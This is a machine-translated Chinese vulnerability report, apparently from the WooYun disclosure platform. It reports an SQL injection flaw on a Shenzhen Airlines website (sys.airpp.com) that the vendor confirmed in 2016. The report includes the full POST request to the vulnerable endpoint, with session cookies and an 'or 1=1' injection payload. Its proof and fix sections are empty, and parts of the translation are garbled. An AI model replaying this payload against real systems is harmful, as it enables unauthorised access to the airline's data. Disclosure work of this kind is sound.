漏洞标题 深圳航空某站存在SQL注入漏洞 相关厂商 深圳航空 漏洞作者 路人甲 提交时间 2016-05-04 21:46 公开时间 2016-06-20 15:40 漏洞类型 SQL注射漏洞 危害等…
漏洞标题
深圳航空公司在车站有一个SQL注入漏洞
相关制造商
深圳航空
漏洞作者
过路人
提交时间
2016-05-04 21: 46
公共时间
2016-06-20 15: 40
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
11
漏洞状态
制造商已确认
标签标签
漏洞详细信息
POST /pptravel/proFrontManageAction!findProByParam.action HTTP/1.1
内容长度: 89
内容类型: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer:http://sys.airpp.com/
Cookie: JSESSIONID=E2737DF255042B15594A3F75B1CB9682.tomcat1; JSESSIONID=E2737DF255042B15594A3F75B1CB9682.tomcat1; Hm_lvt_4060872cc09bf10b0082de626e535d51=1461809370,1461809527,1461809606,1461809870; Hm_lpvt_4060872cc09bf10b0082de626e535d51=1461809870; Clients_IPAddress=%u9655%u897F%u7701%2C%u897F%u5B89%u5E02; HMACCOUNT=15388A95F027CE2A; ASPSESSIONIDSQRBSRRA=NJEGFGIANMPJMIBLKPDLGLLD; ASPSESSIONIDCCDBCSTT=KMGGFGIABAANDOCEALCBBMJJ; __qc_wId=434; pgv_pvid=8689421847
主机: sys.airpp.com
连接:保持活动状态
Accept-Encoding: gzip,deflate
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML,与Gecko一样)Chrome/41.0.2228.0 Safari/537.21
接受: */*
Pname=-1'或1=1 *或'oi2HYvpE'='& scores=1& typeid=

漏洞证明:
修理计划:
版权声明:请注明出处。居民A @乌云